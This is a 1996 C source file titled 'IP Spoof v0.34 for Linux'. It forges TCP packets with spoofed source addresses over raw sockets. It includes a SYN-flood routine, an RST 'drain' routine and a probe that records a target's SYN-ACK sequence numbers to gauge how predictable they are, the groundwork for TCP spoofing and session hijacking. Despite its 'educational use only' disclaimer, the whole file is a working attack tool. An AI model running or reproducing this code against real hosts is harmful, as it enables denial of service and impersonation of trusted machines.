/* IP Spoof v0.34 for Linux 16-9-96
   Copyright 1996 /dev/null, devnull@klaphek.nl
   This software can be found at http://www.klaphek.nl/files.

   This software is just aplha demonstrationware, intended for educational
   use only. Therefore, I, the author, do not take any responsibility for
   any consequences of using this software. This software may blow up your
   computer, other peopless computers, get you arrested, etc., etc. You're
   warned, don't blame me!
   This software may be redistributed for non commercial use, provided that
   no modifications are made to either the source or this notice.
   People are encouraged to improve this code. Please mail me if you do so.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/protocols.h>
#include <linux/if_ether.h>

#ifndef bool
#define bool u_long
#define false (0)
#define true  (1)
#endif

static int send_socket = 0;
static int recv_socket = 0;

unsigned long hostname_to_inet(char *hostname)
{
   unsigned long address;
   struct hostent *hostent;

   if (isdigit(*hostname))
   {
      if ((long int)(address = inet_addr(hostname)) == -1)
      {
         perror("hostname");
         return((unsigned long)-1);
      }
   }
   else
   {
      if (!(hostent = (struct hostent *)gethostbyname(hostname)))
      {
         perror("hostname");
         return((unsigned long)-1);
      }
      memcpy(&address, hostent->h_addr, sizeof(address));
   }
   return(address);
}


bool open_sockets()
{
   if ((send_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
   {
      perror("send socket");
      return(false);
   }
   if ((recv_socket = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP))) == -1)
   {
      perror("receive socket");
      return(false);
   }
   return(true);
}

bool init_sockets()
{
   int i;
   struct sockaddr sa;
   struct sockaddr_in *sa_in = (struct sockaddr_in *)&sa;

   i = 1;
   if (setsockopt(send_socket,IPPROTO_IP,IP_HDRINCL,(char*)&i,sizeof(i))<0)
   {
      perror("setsockopt IP_HDRINCL");
      return(false);
   };

   memset(&sa, 0 ,sizeof(sa));
   sa_in->sin_family = AF_INET;
   sa_in->sin_addr.s_addr = INADDR_ANY;
   if (connect(send_socket, &sa, sizeof(sa)) == -1)
   {
      perror("connect");
      return(false);
   }

   return(true);
}

void close_sockets()
{
   if (send_socket)
      close(send_socket);
   if (recv_socket)
      close(recv_socket);
}


u_short ip_checksum(u_short *data, u_short len)
{
   u_long long_sum;
   u_short sum;

   for(long_sum = 0; len; len--)
      long_sum += htons(data[len - 1]);
   sum = long_sum & 0xffff;
   sum += long_sum >> 16;
   
   return(htons(~sum));
}

#define send_syn(sh, dh, sp, dp, sq) \
   send_shake(sh, dh, sp, dp, sq, TH_SYN)

#define send_rst(sh, dh, sp, dp, sq) \
   send_shake(sh, dh, sp, dp, sq, TH_RST)
   
bool send_shake(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long seq_nr, u_char flags)
{
   static u_char packet[0x2c] = 
   { 0x45, 0x00, 0x00, 0x2c,   /* version, IHL, TOS, total length */ 
     0x00, 0x00, 0x00, 0x00,   /* ident, DF&MF, fragment offset   */
     0xff, 0x06, 0x00, 0x00,   /* TTL, protocol, checksum         */
        0,    0,    0,    0,   /* source IP                       */
        0,    0,    0,    0,   /* destination IP                  */
        0,    0,    0,    0,   /* source port, destination port   */
        0,    0,    0,    0,   /* sequence number                 */
     0x00, 0x00, 0x00, 0x00,   /* acked sequence number           */
     0x60,    0, 0x02, 0x00,   /* TCP header len, SYN/RST, window */
     0x00, 0x1e, 0x00, 0x00,   /* checksum, urgent data           */
     0x02, 0x04, 0x04, 0x00,   /* set max segment size option to  */
                               /* 256 (rather low, to allow SLIP  */
     // 0x00, 0x06, 0x00, 0x18,/*tcp pseudo header piece          */ 
   };

   *(u_long *)(packet + 0x0c) = source_host;
   *(u_long *)(packet + 0x10) = dest_host;
   *(u_short *)(packet + 0x14) = htons(source_port);
   *(u_short *)(packet + 0x16) = htons(dest_port);
   *(u_char *)(packet + 0x21) = flags;
   *(u_long *)(packet + 0x18) = htonl(seq_nr);
   *(u_short *)(packet + 0x24) = htons(0x001e);
   *(u_short *)(packet + 0x24) = ip_checksum((u_short *)(packet + 0x0c), 0x20 /2);

   if ((send(send_socket, packet, 0x2c, 0)) == -1)
   {
      perror("send");
      return(false);
   }
   return(true);
}

u_long recv_ack(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long seq_nr)
{
   u_char packet[1500];
   u_short ihl, length;
   struct ethhdr *ethhdr;
   struct iphdr *iphdr;
   struct tcphdr *tcphdr;

   while((length = recv(recv_socket, packet, 1500, 0)) > 0)
   {
      ethhdr = (struct ethhdr *)packet;
      if (ethhdr->h_proto != htons(ETH_P_IP))
         continue;
 
      iphdr = (struct iphdr *)(packet + 0x0e);
      if ((iphdr->version != 4) || (iphdr->protocol != IP_TCP))
         continue;
      if ((iphdr->saddr != source_host) || (iphdr->daddr != dest_host))
         continue;

      ihl = iphdr->ihl * 4;
      tcphdr = (struct tcphdr *)((u_char *)iphdr + ihl);
      if ((ntohs(tcphdr->th_sport) != source_port) || (ntohs(tcphdr->th_dport) != dest_port))
         continue;
      if (ntohl(tcphdr->th_ack) != seq_nr)
         continue;

      if (tcphdr->th_flags & TH_RST)
      {
         fprintf(stderr, "Probe reset by peer\n");
         return(0);
      }
      if (tcphdr->th_flags != (TH_SYN | TH_ACK))
         continue;

//   printf("Received SYN ACK from %08x.%04x to %08x.%04x: %08x - %08x\n",ntohl(iphdr->saddr), ntohs(tcphdr->th_sport), ntohl(iphdr->daddr), ntohs(tcphdr->th_dport), ntohl(tcphdr->th_seq), ntohl(tcphdr->th_ack));

      return(ntohl(tcphdr->th_seq));       
   }
   return(0);
}

void flood_host(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long start_seq, int count)
{
   int i;

   for (i = 0; i < count; i++)
      send_syn(source_host, dest_host, source_port++, dest_port, start_seq++);
}

void drain_host(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long start_seq, int count)
{
   int i;

   for (i = 0; i < count; i++)
      send_rst(source_host, dest_host, source_port++, dest_port, start_seq++);
}

void determine_acks(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long start_seq, int probes)
{
#define MAX_PROBES 16
   u_long acks[MAX_PROBES];
   int i;

   if (probes > MAX_PROBES) 
      probes =  MAX_PROBES;

   for(i = 0; i < probes; i++)
   {
      send_syn(source_host, dest_host, source_port, dest_port, start_seq++);
      if (!(acks[i] = recv_ack(dest_host, source_host, dest_port, source_port++, start_seq)))
         return;
   }
   for(i = 0; i < probes; i++)
   {
      printf("ACK: %08x", acks[i]);
      if (i > 0)
         printf(", difference: %d", acks[i] - acks[i - 1]);
      printf("\n");
   }
}

int main(int argc, char **argv)
{
   int i, v, count;
   char *progname, *sourcehost, *desthost;
   u_long source_addr, dest_addr;
   u_short source_port, dest_port;
   u_long seq_nr;

   progname = strrchr(argv[0], '/');
   if (progname)
      progname++;
   else
      progname = argv[0];

   if (argc < 7)
   {
      fprintf(stderr,"%s source-ip dest-ip src-port dest-port seq_nr count\n", progname);
      exit(1);
   }
 
   sourcehost = argv[1];
   desthost = argv[2];
   source_port = strtoul(argv[3], (char **)NULL, 0) & 0xffff;
   dest_port = strtoul(argv[4], (char **)NULL, 0) & 0xffff;
   seq_nr = strtoul(argv[5], (char **)NULL, 0);
   count = strtoul(argv[6], (char **)NULL, 0);

   if (!open_sockets())
   {
      close_sockets();
      exit(2);
   }
   if (!init_sockets())
   {
      close_sockets();
      exit(3);
   }

   source_addr = hostname_to_inet(sourcehost);
   dest_addr = hostname_to_inet(desthost);

//   flood_host(source_addr, dest_addr, source_port, dest_port, seq_nr, count);   

//   drain_host(source_addr, dest_addr, source_port, dest_port, seq_nr, count);   

   determine_acks(source_addr, dest_addr, source_port, dest_port, seq_nr, count);

   close_sockets();
}

